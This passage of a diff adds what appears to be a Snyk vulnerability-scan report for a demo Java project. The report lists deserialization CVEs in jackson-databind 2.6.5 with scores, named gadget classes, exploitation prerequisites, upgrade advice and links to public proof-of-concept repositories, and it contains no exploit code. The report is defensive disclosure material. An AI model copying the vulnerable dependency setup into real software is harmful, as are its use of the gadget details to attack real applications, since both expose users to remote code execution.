"from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted 